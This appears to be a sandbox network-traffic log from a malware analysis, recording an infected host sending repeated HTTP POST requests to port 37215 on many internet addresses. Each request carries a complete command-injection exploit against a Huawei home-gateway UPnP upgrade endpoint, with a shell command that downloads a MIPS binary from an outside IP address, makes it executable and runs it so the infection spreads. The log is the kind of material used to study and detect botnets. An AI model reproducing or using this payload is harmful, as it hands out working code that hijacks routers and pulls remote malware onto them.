                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1864192.168.2.233810641.54.28.16337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.551781893 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1865192.168.2.2335100197.230.243.8037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.551981926 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1866192.168.2.23580688.92.246.1537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.552056074 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1867192.168.2.234818441.141.14.19137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.552074909 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1868192.168.2.235239041.240.10.17337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.552079916 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1869192.168.2.2352466157.122.187.13437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.552134037 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1870192.168.2.2359136157.182.220.4937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.552134037 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1871192.168.2.2356052110.187.127.7037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.552402020 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1872192.168.2.2345990157.126.32.7437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.552414894 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1873192.168.2.2344364197.1.38.7137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.552476883 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1874192.168.2.2360206203.110.96.21937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.553066969 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
